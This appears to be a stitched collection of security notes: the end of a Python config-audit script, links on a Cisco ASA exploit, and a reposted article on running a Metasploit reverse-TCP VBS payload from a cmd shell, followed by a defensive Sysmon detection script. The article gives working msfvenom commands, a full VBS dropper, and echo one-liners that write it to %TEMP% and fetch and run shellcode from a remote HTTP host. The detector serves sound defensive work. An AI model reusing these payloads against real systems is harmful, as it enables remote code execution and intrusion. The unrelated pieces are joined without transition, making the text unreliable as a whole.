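def worst_severity(findings: List[Dict]) -> str:
    """Highest severity present, or 'none' for a clean config."""
    return max((f["severity"] for f in findings), key=SEVERITY_ORDER.index, default="none")


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        found = audit(cfg)
        print(f"{name}: {len(found)} finding(s), worst={worst_severity(found)}")
        for f in found:
            where = f"line {f['line']}: {f['text']}" if f["line"] else "whole config"
            print(f"  [{f['severity']}] {f['id']} ({where}) -> {f['advice']}")
```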

    Links

    1. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
    2. http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-3.firewalls/118075-configure-asa-00.html
    3. https://github.com/RiskSense-Ops/CVE-2016-6366/
    4. http://paper.seebug.org/31/

    Windows_ActiveDirectory

    Executing a Metasploit VBS payload from a cmd shell

    If you are a pentester or security researcher, you may want to get a meterpreter session from a cmd shell, for instance from sqlmap --os-shell or other tools. For example:

    $ ncat -l -p 4444
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.  
    
    C:\Documents and Settings\test\Desktop>ver
    ver  
    
    Microsoft Windows XP [Version 5.1.2600]
    C:\Documents and Settings\test\Desktop>

    Previously, you might have tried the following approaches:

    • Convert the exe into a batch script.
    • Download the payload file from a remote server (ftp, tftp, http, ...).
    • ......

    Now I will show you how to run a Metasploit payload in cmd.exe. Consider the following questions:

    • How to generate a payload with msfvenom?
    • How to run the payload in a simple and compatible way?

    How to generate a payload with msfvenom?

    $ msfvenom -p windows/meterpreter/reverse_tcp
     LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win
    
     No encoder or badchars specified, outputting raw payload
     Payload size: 333 bytes
     Final size of vbs file: 7370 bytes
     Function oSpLpsWeU(XwXDDtdR)
      urGQiYVn = "<B64DECODE xmlns:dt=" & Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
      "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
      XwXDDtdR & "</B64DECODE>"
      Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
      gFMdOBBiLZ.LoadXML(urGQiYVn)
      oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
      set gFMdOBBiLZ = nothing
     End Function
    
     Function skbfzWOqR()
      cTENSbYbnWY = "<base64-encoded payload omitted>"
      Dim GBHMAfCsea
      Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
      Dim nYosrMtHSIOKSTI
      Dim LNXsqHXEKZQU
      Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
      LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
      GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
      YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
      Dim voFeIDpffjdo
      Set voFeIDpffjdo = CreateObject("Wscript.Shell")
      WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
      Set WQwWDbhse = CreateObject("ADODB.Stream")
      WQwWDbhse.Type = 1
      WQwWDbhse.Open
      WQwWDbhse.Write WwqoNcaCIbw
      WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
      voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
      GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
      GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
    End Function
    
    skbfzWOqR

    Demo:
    The generated payload can be placed on a server, and the ps code is then executed on the target system using the remote download described at the beginning of the article:

    How to run the payload in a simple/compatible way?

    Reading the code, we can create a simple vbs script named msf.vbs to execute the shellcode. The vbs script runs on Windows XP / 2003 / Vista / 7 / 8 / 10 / 2008 / 2012 / ....

    shellcode = WScript.Arguments.Item(0)
    strXML = "" & shellcode & ""
    Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
    oXMLDoc.LoadXML(strXML)
    decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
    set oXMLDoc = nothing
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tempdir
    Dim basedir
    Set tempdir = fso.GetSpecialFolder(2)
    basedir = tempdir & "\" & fso.GetTempName()
    fso.CreateFolder(basedir)
    tempexe = basedir & "\" & "test.exe"
    Dim adodbstream
    Set adodbstream = CreateObject("ADODB.Stream")
    adodbstream.Type = 1
    adodbstream.Open
    adodbstream.Write decode
    adodbstream.SaveToFile tempexe, 2
    Dim wshell
    Set wshell = CreateObject("Wscript.Shell")
    wshell.run tempexe, 0, true
    fso.DeleteFile(tempexe)
    fso.DeleteFolder(basedir)

    Ok, how to run it in cmd.exe? Do you want to paste the code line by line? A simple command is created as follows:

    Upload msf.vbs to the target system with a single command:

    echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs

    Execute the metasploit payload with msf.vbs and cscript.exe:

    C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>


    Bypassing the nc shell buffer size limit

    If the script is used in cmd.exe on the local host, everything works. But if it is used in a netcat cmd shell, the payload gets corrupted. For example:

    C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
    
    Microsoft (R) Windows Script Host Version 5.7
    Copyright (C) Microsoft Corporation. All rights reserved.
    
    C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
    • original payload size: 6160
    • payload size as received through netcat: 4068

    Try it yourself. To handle this for security testing, a second vbs script was created, which fetches the shellcode over HTTP instead of taking it as a command-line argument:

    echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

    Run the following command to execute your vbs payload:

    START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt
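As an added defender-side example (not part of the original article), the following check flags the three observable steps of the procedure above in constructed Sysmon-style process-creation records: cscript.exe run against a .vbs in a temp directory with an http URL argument, a script host given a long base64 argument, and an exe started from a temp subfolder by a script host. Field names follow Sysmon Event ID 1; the records, paths and folder names are constructed for this example.

```python
import re

# Constructed Sysmon Event ID 1 style records (not captured from a real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\system32\cscript.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"cscript.exe C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs "
                    r"http://192.168.1.100:8080/payload.txt"},
    {"Image": r"C:\WINDOWS\system32\cscript.exe",
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     # long base64 argument ("MZ" header prefix, constructed filler)
     "CommandLine": "cscript.exe msf.vbs " + "TVqQAAMAAAAEAAAA" * 20},
    {"Image": r"C:\DOCUME~1\test\LOCALS~1\Temp\rad1B2C3.tmp\test.exe",
     "ParentImage": r"C:\WINDOWS\system32\cscript.exe",
     "CommandLine": r"C:\DOCUME~1\test\LOCALS~1\Temp\rad1B2C3.tmp\test.exe"},
    {"Image": r"C:\WINDOWS\system32\cscript.exe",   # benign admin script
     "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"cscript.exe C:\Scripts\inventory.vbs /server:fileserver01"},
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
TEMP_PATH = re.compile(r"(%TEMP%|\\Temp\\)", re.IGNORECASE)
URL_ARG = re.compile(r"https?://\S+", re.IGNORECASE)
# A base64 run this long is an embedded binary, not a normal script argument.
B64_ARG = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of the rules a process-creation event matches."""
    hits = []
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    # Step 2 of the procedure: script host runs a temp-dir .vbs that takes a URL.
    if image in SCRIPT_HOSTS and TEMP_PATH.search(cmd) and URL_ARG.search(cmd):
        hits.append("script_host_temp_vbs_url_arg")
    # Earlier variant: the whole payload passed inline as base64.
    if image in SCRIPT_HOSTS and B64_ARG.search(cmd):
        hits.append("script_host_inline_base64_arg")
    # Step 3: the decoded exe is launched from a temp subfolder by the script host.
    if parent in SCRIPT_HOSTS and image.endswith(".exe") and TEMP_PATH.search(ev["Image"]):
        hits.append("exe_in_temp_spawned_by_script_host")
    return hits


def scan(events):
    """Map event index to its rule hits, keeping only events that match."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```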

    Source

    Copyright notice: this is an original article by Fly_hps, licensed under the CC 4.0 BY-SA license; when reposting, please include a link to the original and this notice.
    Original link: https://blog.csdn.net/Fly_hps/article/details/80970450
